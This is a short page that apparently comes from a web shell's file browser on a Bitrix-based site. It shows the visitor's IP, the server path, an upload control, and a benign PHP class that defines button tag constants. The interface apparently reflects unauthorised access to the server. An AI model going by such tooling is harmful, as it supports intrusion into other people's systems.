Your IP : 108.162.241.184


Current Path : /var/www/element/data/www/revenuestory.ru/bitrix/modules/ui/lib/buttons/
Upload File :
Current File : /var/www/element/data/www/revenuestory.ru/bitrix/modules/ui/lib/buttons/tag.php

<?php
namespace Bitrix\UI\Buttons;

abstract class Tag
{
	const BUTTON = "button";
	const LINK   = "a";
	const SUBMIT = "submit";
	const INPUT  = "input";
}